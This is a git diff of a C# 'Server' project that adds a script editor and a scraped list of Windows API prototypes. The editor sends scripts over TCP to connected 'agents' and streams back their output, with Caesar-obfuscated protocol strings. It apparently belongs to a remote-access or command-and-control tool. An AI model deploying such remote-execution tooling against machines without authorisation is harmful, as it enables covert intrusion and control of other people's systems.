this.saveAsCTRLMajSToolStripMenuItem.Name = "saveAsCTRLMajSToolStripMenuItem"; + this.saveAsCTRLMajSToolStripMenuItem.ShortcutKeys = ((System.Windows.Forms.Keys)(((System.Windows.Forms.Keys.Control | System.Windows.Forms.Keys.Shift) + | System.Windows.Forms.Keys.S))); + this.saveAsCTRLMajSToolStripMenuItem.Size = new System.Drawing.Size(180, 22); + this.saveAsCTRLMajSToolStripMenuItem.Text = "Save as"; + this.saveAsCTRLMajSToolStripMenuItem.Click += new System.EventHandler(this.saveAsCTRLMajSToolStripMenuItem_Click); + // + // closeCTRLToolStripMenuItem + // + this.closeCTRLToolStripMenuItem.Name = "closeCTRLToolStripMenuItem"; + this.closeCTRLToolStripMenuItem.ShortcutKeys = ((System.Windows.Forms.Keys)((System.Windows.Forms.Keys.Control | System.Windows.Forms.Keys.W))); + this.closeCTRLToolStripMenuItem.Size = new System.Drawing.Size(180, 22); + this.closeCTRLToolStripMenuItem.Text = "Close"; + this.closeCTRLToolStripMenuItem.Click += new System.EventHandler(this.closeCTRLToolStripMenuItem_Click); + // + // codeToolStripMenuItem + // + this.codeToolStripMenuItem.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] { + this.executeToolStripMenuItem}); + this.codeToolStripMenuItem.Name = "codeToolStripMenuItem"; + this.codeToolStripMenuItem.Size = new System.Drawing.Size(47, 20); + this.codeToolStripMenuItem.Text = "Code"; + // + // executeToolStripMenuItem + // + this.executeToolStripMenuItem.Name = "executeToolStripMenuItem"; + this.executeToolStripMenuItem.Size = new System.Drawing.Size(115, 22); + this.executeToolStripMenuItem.Text = "Execute"; + this.executeToolStripMenuItem.Click += new System.EventHandler(this.executeToolStripMenuItem_Click); + // + // richTextBox1 + // + this.richTextBox1.AcceptsTab = true; + this.richTextBox1.Dock = System.Windows.Forms.DockStyle.Top; + this.richTextBox1.EnableAutoDragDrop = true; + this.richTextBox1.Font = new System.Drawing.Font("Microsoft Sans Serif", 12F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0))); + this.richTextBox1.Location = new System.Drawing.Point(0, 24); + this.richTextBox1.Name = "richTextBox1"; + this.richTextBox1.Size = new System.Drawing.Size(800, 370); + this.richTextBox1.TabIndex = 1; + this.richTextBox1.Text = ""; + this.richTextBox1.TextChanged += new System.EventHandler(this.richTextBox1_TextChanged); + // + // textBox1 + // + this.textBox1.Dock = System.Windows.Forms.DockStyle.Fill; + this.textBox1.Location = new System.Drawing.Point(0, 394); + this.textBox1.Multiline = true; + this.textBox1.Name = "textBox1"; + this.textBox1.ReadOnly = true; + this.textBox1.ScrollBars = System.Windows.Forms.ScrollBars.Vertical; + this.textBox1.Size = new System.Drawing.Size(800, 56); + this.textBox1.TabIndex = 2; + // + // splitter1 + // + this.splitter1.BackColor = System.Drawing.SystemColors.ScrollBar; + this.splitter1.Dock = System.Windows.Forms.DockStyle.Top; + this.splitter1.Location = new System.Drawing.Point(0, 394); + this.splitter1.Name = "splitter1"; + this.splitter1.Size = new System.Drawing.Size(800, 5); + this.splitter1.TabIndex = 3; + this.splitter1.TabStop = false; + // + // PasmEditor + // + this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 13F); + this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font; + this.ClientSize = new System.Drawing.Size(800, 450); + this.Controls.Add(this.splitter1); + this.Controls.Add(this.textBox1); + this.Controls.Add(this.richTextBox1); + this.Controls.Add(this.menuStrip1); + this.MainMenuStrip = this.menuStrip1; + this.Name = "PasmEditor"; + this.Text = "pasm editor - New File"; + this.menuStrip1.ResumeLayout(false); + this.menuStrip1.PerformLayout(); + this.ResumeLayout(false); + this.PerformLayout(); + + } + + #endregion + + private System.Windows.Forms.MenuStrip menuStrip1; + private System.Windows.Forms.ToolStripMenuItem fileToolStripMenuItem; + private System.Windows.Forms.ToolStripMenuItem openToolStripMenuItem; + private System.Windows.Forms.ToolStripMenuItem saveToolStripMenuItem; + private System.Windows.Forms.ToolStripMenuItem saveAsCTRLMajSToolStripMenuItem; + private System.Windows.Forms.ToolStripMenuItem newCTRLNToolStripMenuItem; + private System.Windows.Forms.ToolStripMenuItem closeCTRLToolStripMenuItem; + private System.Windows.Forms.RichTextBox richTextBox1; + private System.Windows.Forms.TextBox textBox1; + private System.Windows.Forms.Splitter splitter1; + private System.Windows.Forms.ToolStripMenuItem codeToolStripMenuItem; + private System.Windows.Forms.ToolStripMenuItem executeToolStripMenuItem; + } +} \ No newline at end of file diff --git a/Server/PasmEditor.cs b/Server/PasmEditor.cs new file mode 100644 index 0000000..1e6348f --- /dev/null +++ b/Server/PasmEditor.cs @@ -0,0 +1,189 @@ +using System; +using System.IO; +using System.Collections.Generic; +using System.ComponentModel; +using System.Data; +using System.Drawing; +using System.Linq; +using System.Text; +using System.Threading.Tasks; +using System.Windows.Forms; +using System.Net.Sockets; +using System.Threading; +using static System.Windows.Forms.VisualStyles.VisualStyleElement; +using System.Runtime.InteropServices; +using System.Text.RegularExpressions; +using System.Xml; + +namespace Server +{ + public partial class PasmEditor : Form + { + private static string filepath = ""; + private static bool is_executing = false; + public PasmEditor(bool is_from_right_click) + { + InitializeComponent(); + executeToolStripMenuItem.Enabled = is_from_right_click; + richTextBox1.DragDrop += new DragEventHandler(richTextBox1_DragDrop); + } + + private void newCTRLNToolStripMenuItem_Click(object sender, EventArgs e) + { + richTextBox1.Text = ""; + filepath = ""; + this.Text = "pasm editor - New File"; + } + + private void openToolStripMenuItem_Click(object sender, EventArgs e) + { + OpenFileDialog openFileDialog = new OpenFileDialog + { + Filter = "PASM source files (*.pasm)|*.pasm", + Title = "Select your PASM source code file." + }; + + if (openFileDialog.ShowDialog() != DialogResult.OK) + return; + + string filePath = openFileDialog.FileName; + if (filePath == null) return; + + richTextBox1.LoadFile(filePath, RichTextBoxStreamType.PlainText); + filepath = filePath; + + this.Text = "pasm editor - " + Path.GetFileName(filePath); + } + + private void saveToolStripMenuItem_Click(object sender, EventArgs e) + { + if (filepath == "") + { + saveAsCTRLMajSToolStripMenuItem_Click(sender, e); + return; + } + richTextBox1.SaveFile(filepath, RichTextBoxStreamType.PlainText); + } + + private void saveAsCTRLMajSToolStripMenuItem_Click(object sender, EventArgs e) + { + SaveFileDialog saveFileDialog = new SaveFileDialog + { + Filter = "PASM source files (*.pasm)|*.pasm", + Title = "Save as" + }; + + if (saveFileDialog.ShowDialog() != DialogResult.OK) + return; + + string filePath = saveFileDialog.FileName; + if (filePath == null) return; + + richTextBox1.SaveFile(filePath, RichTextBoxStreamType.PlainText); + filepath = filePath; + } + + private void closeCTRLToolStripMenuItem_Click(object sender, EventArgs e) + { + richTextBox1.Text = ""; + filepath = ""; + this.Text = "pasm editor - New File"; + } + + void richTextBox1_DragDrop(object sender, DragEventArgs e) + { + object filename = e.Data.GetData("FileDrop"); + if (filename != null) + { + var list = filename as string[]; + + if (list != null && !string.IsNullOrWhiteSpace(list[0])) + { + richTextBox1.Clear(); + richTextBox1.LoadFile(list[0], RichTextBoxStreamType.PlainText); + filepath = list[0]; + this.Text = "pasm editor - " + Path.GetFileName(filepath); + } + } + e.Effect = DragDropEffects.None; + } + + private void execute_script() + { + is_executing = true; + TcpClient c = Server.Menu.CONNECT_CLIENTS[Server.Menu.CLIENT_ID]; + c.ReceiveTimeout = 10000; + c.Client.Blocking = true; + + try + { + NetworkStream stream = c.GetStream(); + + byte[] Message = System.Text.Encoding.UTF8.GetBytes(Utils.CAESAR("pasm")); + stream.Write(Message, 0, Message.Length); + + string fileContent = File.ReadAllText(filepath); + byte[] fileContentBytes = Encoding.UTF8.GetBytes(fileContent); + stream.Write(fileContentBytes, 0, fileContentBytes.Length); + + byte[] buffer = new byte[2048]; + int bytesRead; + + textBox1.Text += "\r\n\r\nLaika: script sent\r\n\r\n"; + + while (true) + { + bytesRead = stream.Read(buffer, 0, buffer.Length); + string receivedData = System.Text.Encoding.UTF8.GetString(buffer, 0, bytesRead); + + if (receivedData == "fail") + { + textBox1.Text += "Agent failed to execute the script due to an unknown error.\n"; + textBox1.SelectionStart = textBox1.TextLength; + textBox1.ScrollToCaret(); + break; + } + + textBox1.Text += receivedData.Replace(Utils.CAESAR("Laika: end of script"), "").Replace("\n", "\r\n"); + + if (receivedData.Contains(Utils.CAESAR("Laika: end of script"))) + { + textBox1.Text += "\r\n\r\nLaika: end of script\r\n\r\n"; + textBox1.SelectionStart = textBox1.TextLength; + textBox1.ScrollToCaret(); + break; + } + + textBox1.SelectionStart = textBox1.TextLength; + textBox1.ScrollToCaret(); + this.Update(); + } + } + catch + { + MessageBox.Show("Client timed out."); + } + + is_executing = false; + executeToolStripMenuItem.Enabled = true; + } + private void executeToolStripMenuItem_Click(object sender, EventArgs e) + { + if (is_executing) + return; + + Thread t = new Thread(execute_script); + t.Start(); + + executeToolStripMenuItem.Enabled = false; + } + + private void richTextBox1_TextChanged(object sender, EventArgs e) + { + if (!this.Text.Contains("*")) + { + this.Text += "*"; + } + } + } +} diff --git a/Server/PasmEditor.resx b/Server/PasmEditor.resx new file mode 100644 index 0000000..d5494e3 --- /dev/null +++ b/Server/PasmEditor.resx @@ -0,0 +1,123 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + text/microsoft-resx + + + 2.0 + + + System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 + + + System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 + + + 17, 17 + + \ No newline at end of file diff --git a/Server/Program.cs b/Server/Program.cs index 2e792e5..27bd02f 100644 --- a/Server/Program.cs +++ b/Server/Program.cs @@ -105,7 +105,6 @@ namespace Server finally { ClearSocketData(c); - c.Client.Blocking = false; if (shell != null) { shell.Close(); @@ -123,7 +122,6 @@ namespace Server byte[] message = Encoding.UTF8.GetBytes(Utils.CAESAR("exit\n")); stream.Write(message, 0, message.Length); ClearSocketData(c); - c.Client.Blocking = false; } catch { } OPENED = false; diff --git a/Server/Properties/Resources.Designer.cs b/Server/Properties/Resources.Designer.cs index 8e58f1c..4f00da0 100644 --- a/Server/Properties/Resources.Designer.cs +++ b/Server/Properties/Resources.Designer.cs @@ -120,6 +120,16 @@ namespace Server.Properties { } } + /// + /// Recherche une ressource localisée de type System.Drawing.Bitmap. + /// + internal static System.Drawing.Bitmap scenario { + get { + object obj = ResourceManager.GetObject("scenario", resourceCulture); + return ((System.Drawing.Bitmap)(obj)); + } + } + /// /// Recherche une ressource localisée de type System.Drawing.Bitmap. /// diff --git a/Server/Properties/Resources.resx b/Server/Properties/Resources.resx index ab9aad9..34048d9 100644 --- a/Server/Properties/Resources.resx +++ b/Server/Properties/Resources.resx @@ -118,8 +118,8 @@ System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 - - ..\Resources\file.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a + + ..\Resources\up_arrow.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a ..\Resources\terminal.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a @@ -136,13 +136,16 @@ ..\Resources\folder.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a - - ..\Resources\download.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a - ..\Resources\upload.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a - - ..\Resources\up_arrow.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a + + ..\Resources\download.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a + + + ..\Resources\file.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a + + + ..\Resources\scenario.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a \ No newline at end of file diff --git a/Server/Resources/scenario.png b/Server/Resources/scenario.png new file mode 100644 index 0000000..90569a4 Binary files /dev/null and b/Server/Resources/scenario.png differ diff --git a/Server/Server.csproj b/Server/Server.csproj index 2b7ef18..c5a7046 100644 --- a/Server/Server.csproj +++ b/Server/Server.csproj @@ -33,8 +33,36 @@ 4 + + ..\packages\Microsoft.Bcl.AsyncInterfaces.8.0.0\lib\net462\Microsoft.Bcl.AsyncInterfaces.dll + + + ..\packages\System.Buffers.4.5.1\lib\net461\System.Buffers.dll + + + ..\packages\System.Memory.4.5.5\lib\net461\System.Memory.dll + + + + ..\packages\System.Numerics.Vectors.4.5.0\lib\net46\System.Numerics.Vectors.dll + + + ..\packages\System.Runtime.CompilerServices.Unsafe.6.0.0\lib\net461\System.Runtime.CompilerServices.Unsafe.dll + + + ..\packages\System.Text.Encodings.Web.8.0.0\lib\net462\System.Text.Encodings.Web.dll + + + ..\packages\System.Text.Json.8.0.4\lib\net462\System.Text.Json.dll + + + ..\packages\System.Threading.Tasks.Extensions.4.5.4\lib\net461\System.Threading.Tasks.Extensions.dll + + + ..\packages\System.ValueTuple.4.5.0\lib\net47\System.ValueTuple.dll + @@ -64,6 +92,12 @@ Menu.cs + + Form + + + PasmEditor.cs + @@ -75,6 +109,9 @@ Menu.cs + + PasmEditor.cs + ResXFileCodeGenerator Resources.Designer.cs @@ -85,6 +122,7 @@ Resources.resx True + SettingsSingleFileGenerator Settings.Designer.cs @@ -125,5 +163,8 @@ + + + \ No newline at end of file diff --git a/Server/packages.config b/Server/packages.config new file mode 100644 index 0000000..2f9e97d --- /dev/null +++ b/Server/packages.config @@ -0,0 +1,12 @@ + + + + + + + + + + + + \ No newline at end of file diff --git a/data/get_winapis.py b/data/get_winapis.py new file mode 100644 index 0000000..00956be --- /dev/null +++ b/data/get_winapis.py @@ -0,0 +1,53 @@ +import requests +from bs4 import BeautifulSoup +from urllib.parse import urlparse +from urllib.parse import parse_qs +import json + +url = f"https://www.gladir.com/CODER/CWINDOWS/apiwinprototypes.htm" +r = requests.get(url) + +if r.status_code != 200 and r.status_code != 202 : + print(f"Code != 200: {r.status_code}") + exit(0) + +html = r.text + +soup = BeautifulSoup(html, 'html.parser') +table = soup.find('table', {'class': 'ListCoder'}) + +functions_list = [] +for row in table.find_all('tr')[1:]: + cells = row.find_all('td') + + # Function name + function_name = cells[0].text.strip() + + # Prototype + prototype = cells[1].text.strip() + + # Extract arguments types + arguments = [] + if '(' in prototype: + args_string = prototype.split('(')[1].split(')')[0].strip() + if args_string: + args = args_string.split(',') + for arg in args: + arg_type = ' '.join(arg.strip().split()[:-1]) + arguments.append(arg_type) + + # DLL name + dll_name = cells[2].text.strip() + + # Add the function to the list + functions_list.append({ + 'function_name': function_name, + 'arguments': arguments, + 'dll_name': dll_name, + 'full_prototype': prototype.replace("\n", "").replace("\r", "").replace("\t", "") + }) + +json_output = json.dumps(functions_list, ensure_ascii=False, indent=4) +with open("win_apis.json", "w") as f : + f.write(json_output) +print(json_output) \ No newline at end of file diff --git a/data/win_apis.json b/data/win_apis.json new file mode 100644 index 0000000..349cd7f --- /dev/null +++ b/data/win_apis.json @@ -0,0 +1,17828 @@ +[ + { + "function_name": "AbnormalTermination", + "arguments": [ + "" + ], + "dll_name": "", + "full_prototype": "BOOL AbnormalTermination(VOID);" + }, + { + "function_name": "AbortDoc", + "arguments": [ + "HDC" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int AbortDoc(HDC hdc);" + }, + { + "function_name": "AbortPath", + "arguments": [ + "HDC" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL AbortPath(HDC hdc);" + }, + { + "function_name": "AbortPrinter", + "arguments": [ + "HANDLE" + ], + "dll_name": "winspool.drv", + "full_prototype": "BOOL AbortPrinter(HANDLE hPrinter);" + }, + { + "function_name": "AbortSystemShutdownA", + "arguments": [ + "LPSTR" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL AbortSystemShutdownA(LPSTR lpMachineName);" + }, + { + "function_name": "AbortSystemShutdownW", + "arguments": [ + "LPWSTR" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL AbortSystemShutdownW(LPWSTR lpMachineName)" + }, + { + "function_name": "AccessCheck", + "arguments": [ + "PSECURITY_DESCRIPTOR", + "HANDLE", + "DWORD", + "PGENERIC_MAPPING", + "PPRIVILEGE_SET", + "LPDWORD", + "LPDWORD", + "LPBOOL" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL AccessCheck( PSECURITY_DESCRIPTOR pSecurityDescriptor, HANDLE ClientToken, DWORD DesiredAccess, PGENERIC_MAPPING GenericMapping, PPRIVILEGE_SET PrivilegeSet, LPDWORD PrivilegeSetLength, LPDWORD GrantedAccess, LPBOOL AccessStatus );" + }, + { + "function_name": "AccessCheckAndAuditAlarmA", + "arguments": [ + "LPCTSTR", + "LPVOID", + "LPTSTR", + "LPTSTR", + "PSECURITY_DESCRIPTOR", + "DWORD", + "PGENERIC_MAPPING", + "BOOL", + "LPDWORD", + "LPBOOL", + "LPBOOL" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL AccessCheckAndAuditAlarmA( LPCTSTR SubsystemName, LPVOID HandleId, LPTSTR ObjectTypeName, LPTSTR ObjectName, PSECURITY_DESCRIPTOR SecurityDescriptor, DWORD DesiredAccess, PGENERIC_MAPPING GenericMapping, BOOL ObjectCreation, LPDWORD GrantedAccess, LPBOOL AccessStatus, LPBOOL pfGenerateOnClose );" + }, + { + "function_name": "AccessCheckAndAuditAlarmW", + "arguments": [ + "LPCWSTR", + "LPVOID", + "LPWSTR", + "LPWSTR", + "PSECURITY_DESCRIPTOR", + "DWORD", + "PGENERIC_MAPPING", + "BOOL", + "LPDWORD", + "LPBOOL", + "LPBOOL" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL AccessCheckAndAuditAlarmW(LPCWSTR SubsystemName, LPVOID HandleId, LPWSTR ObjectTypeName, LPWSTR ObjectName, PSECURITY_DESCRIPTOR SecurityDescriptor, DWORD DesiredAccess, PGENERIC_MAPPING GenericMapping, BOOL ObjectCreation, LPDWORD GrantedAccess, LPBOOL AccessStatus, LPBOOL pfGenerateOnClose);" + }, + { + "function_name": "AcsLan", + "arguments": [ + "PLLC_CCB", + "PLLC_CCB *" + ], + "dll_name": "dlcapi.dll", + "full_prototype": "ACSLAN_STATUS AcsLan(PLLC_CCB pCcb,PLLC_CCB * ppBadCcb);" + }, + { + "function_name": "ActivateKeyboardLayout", + "arguments": [ + "HKL", + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "HKL ActivateKeyboardLayout(HKL hkl,UINT Flags);" + }, + { + "function_name": "AddAccessAllowedAce", + "arguments": [ + "PACL", + "DWORD", + "DWORD", + "PSID" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL AddAccessAllowedAce(PACL pAcl, DWORD dwAceRevision, DWORD AccessMask, PSID pSid);" + }, + { + "function_name": "AddAccessDeniedAce", + "arguments": [ + "PACL", + "DWORD", + "DWORD", + "PSID" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL AddAccessDeniedAce(PACL pAcl, DWORD dwAceRevision, DWORD AccessMask,PSID pSid);" + }, + { + "function_name": "AddAce", + "arguments": [ + "PACL", + "DWORD", + "DWORD", + "LPVOID", + "DWORD" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL AddAce(PACL pAcl, DWORD dwAceRevision, DWORD dwStartingAceIndex, LPVOID pAceList, DWORD nAceListLength);" + }, + { + "function_name": "AddAtomA", + "arguments": [ + "LPCSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "ATOM AddAtomA(LPCSTR lpString);" + }, + { + "function_name": "AddAtomW", + "arguments": [ + "LPCWSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "ATOM AddAtomW(LPCWSTR lpString);" + }, + { + "function_name": "AddAuditAccessAce", + "arguments": [ + "PACL", + "DWORD", + "DWORD", + "PSID", + "BOOL", + "BOOL" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL AddAuditAccessAce(PACL pAcl,DWORD dwAceRevision,DWORD dwAccessMask,PSID pSid,BOOL bAuditSuccess,BOOL bAuditFailure);" + }, + { + "function_name": "AddFontResourceA", + "arguments": [ + "LPCTSTR" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int AddFontResourceA(LPCTSTR lpszFilename);" + }, + { + "function_name": "AddFontResourceW", + "arguments": [ + "LPCWSTR" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int AddFontResourceW(LPCWSTR lpszFilename);" + }, + { + "function_name": "AddFormA", + "arguments": [ + "HANDLE", + "DWORD", + "LPBYTE" + ], + "dll_name": "winspool.drv", + "full_prototype": "BOOL AddFormA(HANDLE hPrinter,DWORD Level,LPBYTE pForm);" + }, + { + "function_name": "AddInksetInterval", + "arguments": [ + "HINKSET", + "LPINTERVAL" + ], + "dll_name": "penwin32.dll", + "full_prototype": "BOOL AddInksetInterval(HINKSET hinkset, LPINTERVAL lpiNew);" + }, + { + "function_name": "AddJobA", + "arguments": [ + "HANDLE", + "DWORD", + "LPBYTE", + "DWORD", + "LPDWORD" + ], + "dll_name": "winspool.drv", + "full_prototype": "BOOL AddJobA(HANDLE hPrinter, DWORD Level, LPBYTE pData, DWORD cbBuf, LPDWORD pcbNeeded );" + }, + { + "function_name": "AddMonitorA", + "arguments": [ + "LPTSTR", + "DWORD", + "LPBYTE" + ], + "dll_name": "winspool.drv", + "full_prototype": "BOOL AddMonitorA( LPTSTR pName, DWORD Level, LPBYTE pMonitors );" + }, + { + "function_name": "AddPenDataHRC", + "arguments": [ + "HRC", + "HPENDATA" + ], + "dll_name": "penwin32.dll", + "full_prototype": "int AddPenDataHRC(HRC hrc, HPENDATA hpndt);" + }, + { + "function_name": "AddPenInputHRC", + "arguments": [ + "HRC", + "LPPOINT", + "LPVOID", + "UINT", + "LPSTROKEINFO" + ], + "dll_name": "penwin32.dll", + "full_prototype": "int AddPenInputHRC( HRC hrc, LPPOINT lppt, LPVOID lpvOem, UINT fuOem, LPSTROKEINFO lpsi );" + }, + { + "function_name": "AddPointsPenData", + "arguments": [ + "HPENDATA", + "LPPOINT", + "LPVOID", + "LPSTROKEINFO" + ], + "dll_name": "penwin32.dll", + "full_prototype": "HPENDATA AddPointsPenData( HPENDATA hpendata, LPPOINT lppt, LPVOID lpvOem, LPSTROKEINFO lpsiNew )" + }, + { + "function_name": "AddPortA", + "arguments": [ + "LPTSTR", + "HWND", + "LPTSTR" + ], + "dll_name": "winspool.drv", + "full_prototype": "BOOL AddPortA(LPTSTR pName, HWND hWnd, LPTSTR pMonitorName);" + }, + { + "function_name": "AddPrinterA", + "arguments": [ + "LPTSTR", + "DWORD", + "LPBYTE" + ], + "dll_name": "winspool.drv", + "full_prototype": "HANDLE AddPrinterA( LPTSTR pName, DWORD Level, LPBYTE pPrinter );" + }, + { + "function_name": "AddPrinterConnectionA", + "arguments": [ + "LPTSTR" + ], + "dll_name": "winspool.drv", + "full_prototype": "BOOL AddPrinterConnectionA(LPTSTR pName);" + }, + { + "function_name": "AddPrinterDriverA", + "arguments": [ + "LPTSTR", + "DWORD", + "LPBYTE" + ], + "dll_name": "winspool.drv", + "full_prototype": "BOOL AddPrinterDriverA( LPTSTR pName, DWORD Level, LPBYTE pDriverInfo );" + }, + { + "function_name": "AddPrintProcessorA", + "arguments": [ + "LPTSTR", + "LPTSTR", + "LPTSTR", + "LPTSTR" + ], + "dll_name": "winspool.drv", + "full_prototype": "BOOL AddPrintProcessorA( LPTSTR pName, LPTSTR pEnvironment, LPTSTR pPathName, LPTSTR pPrintProcessorName );" + }, + { + "function_name": "AddPrintProvidorA", + "arguments": [ + "LPTSTR", + "DWORD", + "LPBYTE" + ], + "dll_name": "winspool.drv", + "full_prototype": "BOOL AddPrintProvidorA( LPTSTR pName, DWORD Level, LPBYTE pProvidorInfo );" + }, + { + "function_name": "AddWordsHWL", + "arguments": [ + "HWL", + "LPSTR", + "UINT" + ], + "dll_name": "penwin32.dll", + "full_prototype": "int AddWordsHWL( HWL hwl, LPSTR lpsz, UINT uType );" + }, + { + "function_name": "AdjustTokenGroups", + "arguments": [ + "HANDLE", + "BOOL", + "PTOKEN_GROUPS", + "DWORD", + "PTOKEN_GROUPS", + "PDWORD" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL AdjustTokenGroups( HANDLE TokenHandle, BOOL ResetToDefault, PTOKEN_GROUPS NewState, DWORD BufferLength, PTOKEN_GROUPS PreviousState, PDWORD ReturnLength );" + }, + { + "function_name": "AdjustTokenPrivileges", + "arguments": [ + "HANDLE", + "BOOL", + "PTOKEN_PRIVILEGES", + "DWORD", + "PTOKEN_PRIVILEGES", + "PDWORD" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL AdjustTokenPrivileges( HANDLE TokenHandle, BOOL DisableAllPrivileges, PTOKEN_PRIVILEGES NewState, DWORD BufferLength, PTOKEN_PRIVILEGES PreviousState, PDWORD ReturnLength );" + }, + { + "function_name": "AdjustWindowRect", + "arguments": [ + "LPRECT", + "DWORD", + "BOOL" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL AdjustWindowRect( LPRECT lpRect, DWORD dwStyle, BOOL bMenu );" + }, + { + "function_name": "AdjustWindowRectEx", + "arguments": [ + "LPRECT", + "DWORD", + "BOOL", + "DWORD" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL AdjustWindowRectEx( LPRECT lpRect, DWORD dwStyle, BOOL bMenu, DWORD dwExStyle );" + }, + { + "function_name": "AdvancedDocumentPropertiesA", + "arguments": [ + "HWND", + "HANDLE", + "LPTSTR", + "PDEVMODE", + "PDEVMODE" + ], + "dll_name": "winspool.drv", + "full_prototype": "LONG AdvancedDocumentPropertiesA( HWND hWnd, HANDLE hPrinter, LPTSTR pDeviceName, PDEVMODE pDevModeOutput, PDEVMODE pDevModeInput );" + }, + { + "function_name": "AllocateAndInitializeSid", + "arguments": [ + "PSID_IDENTIFIER_AUTHORITY", + "BYTE", + "DWORD", + "DWORD", + "DWORD", + "DWORD", + "DWORD", + "DWORD", + "DWORD", + "DWORD", + "PSID" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL AllocateAndInitializeSid( PSID_IDENTIFIER_AUTHORITY pIdentifierAuthority, BYTE nSubAuthorityCount, DWORD dwSubAuthority0, DWORD dwSubAuthority1, DWORD dwSubAuthority2, DWORD dwSubAuthority3, DWORD dwSubAuthority4, DWORD dwSubAuthority5, DWORD dwSubAuthority6, DWORD dwSubAuthority7, PSID *pSid );" + }, + { + "function_name": "AllocateLocallyUniqueId", + "arguments": [ + "PLUID" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL AllocateLocallyUniqueId(PLUID Luid);" + }, + { + "function_name": "AllocConsole", + "arguments": [ + "" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL AllocConsole(void);" + }, + { + "function_name": "AngleArc", + "arguments": [ + "HDC", + "int", + "int", + "DWORD", + "FLOAT", + "FLOAT" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL AngleArc( HDC hdc, int X, int Y, DWORD dwRadius, FLOAT eStartAngle, FLOAT eSweepAngle );" + }, + { + "function_name": "AnimatePalette", + "arguments": [ + "HPALETTE", + "UINT", + "UINT", + "CONST PALETTEENTRY" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL AnimatePalette( HPALETTE hpal, UINT iStartIndex, UINT cEntries, CONST PALETTEENTRY *ppe );" + }, + { + "function_name": "AnyPopup", + "arguments": [ + "" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL AnyPopup(VOID);" + }, + { + "function_name": "AppendMenuA", + "arguments": [ + "HMENU", + "UINT", + "UINT", + "LPCTSTR" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL AppendMenuA(HMENU hMenu, UINT uFlags, UINT uIDNewItem, LPCTSTR lpNewItem);" + }, + { + "function_name": "AppendMenuW", + "arguments": [ + "HMENU", + "UINT", + "UINT", + "LPCWSTR" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL AppendMenuW(HMENU hMenu, UINT uFlags, UINT uIDNewItem, LPCWSTR lpNewItem);" + }, + { + "function_name": "Arc", + "arguments": [ + "HDC", + "int", + "int", + "int", + "int", + "int", + "int", + "int", + "int" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL Arc( HDC hdc, int nLeftRect, int nTopRect, int nRightRect, int nBottomRect, int nXStartArc, int nYStartArc, int nXEndArc, int nYEndArc );" + }, + { + "function_name": "ArcTo", + "arguments": [ + "HDC", + "int", + "int", + "int", + "int", + "int", + "int", + "int", + "int" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL ArcTo( HDC hdc, int nLeftRect, int nTopRect, int nRightRect, int nBottomRect, int nXRadial1, int nYRadial1, int nXRadial2,int nYRadial2 );" + }, + { + "function_name": "AreAllAccessesGranted", + "arguments": [ + "DWORD", + "DWORD" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL AreAllAccessesGranted( DWORD GrantedAccess, DWORD DesiredAccess );" + }, + { + "function_name": "AreAnyAccessesGranted", + "arguments": [ + 